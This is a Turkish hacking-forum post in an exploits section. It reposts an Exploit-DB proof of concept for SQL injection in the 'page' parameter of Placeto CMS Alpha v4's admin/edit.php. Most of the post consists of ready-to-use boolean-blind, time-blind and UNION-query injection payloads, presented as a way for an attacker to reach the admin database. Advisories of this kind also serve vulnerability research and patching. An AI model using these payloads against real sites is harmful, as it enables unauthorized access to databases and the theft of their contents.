İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

Placeto CMS Alpha v4 - 'page' SQL Injection

21-03-2019 23:51
#1
deargod - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
vice city
Mesajlar:
167
Teşekkür (Etti):
20
Teşekkür (Aldı):
36
Konular:
15
Ticaret:
(0) %
# Title/Başlık: Placeto CMS
# Date/Tarih: 21.03.2019
# Exploit Author/Exploit Yazarı: Abdullah Çelebi
# Vendor Homepage/Yapımcı Adresi: https://sourceforge.net/projects/placeto/
# Software Link/Yazılım Linki: https://sourceforge.net/projects/pla....4/placeto.zip
# Version: Alpha rv.4
# Category/Kategori: Webapps
# Tested on/Test Edilen Platform: WAMPP @win
# Software description/Yazılım Açıklaması:Kullanımı kolay bir CMS(içerik yönetim sistemi)dir.Hızlı olması ve hafızada az alan kaplaması için yazılmıştır.Bant genişliğini ve CPU süresini kısaltır.

# Vulnerabilities:
Saldırgan, şu parametreleri kullanarak admin veritabanına erişim sağlayabilir:


# POC - SQLi :

# Parameter: page (GET)
# Request URL: http://localhost/placeto/admin/edit.php?page=key

# Type : boolean-based blind
page=JyI" AND 1647=1647 AND "svwN"="svwN

# Type : time-based blind
page=JyI" AND SLEEP(5) AND "uIvY"="uIvY

# Type : union query
page=-8388" UNION ALL SELECT
NULL,CONCAT(0x716b627671,0x6a636f485445445466517a4 a6f6972635551635179725550617072647371784f6445576b7 4736849,0x716b6b6b71),NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL--
CbSf


# Exploit Adresi : https://www.exploit-db.com/exploits/46588
Kullanıcı İmzası
"Ulusal egemenlik öyle bir nurdur ki, onun karşısında zincirler erir, taç ve tahtlar yanar, mahvolur."
Mustafa Kemal ATATÜRK

telegram: deargod_tht
XNovATurkX Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı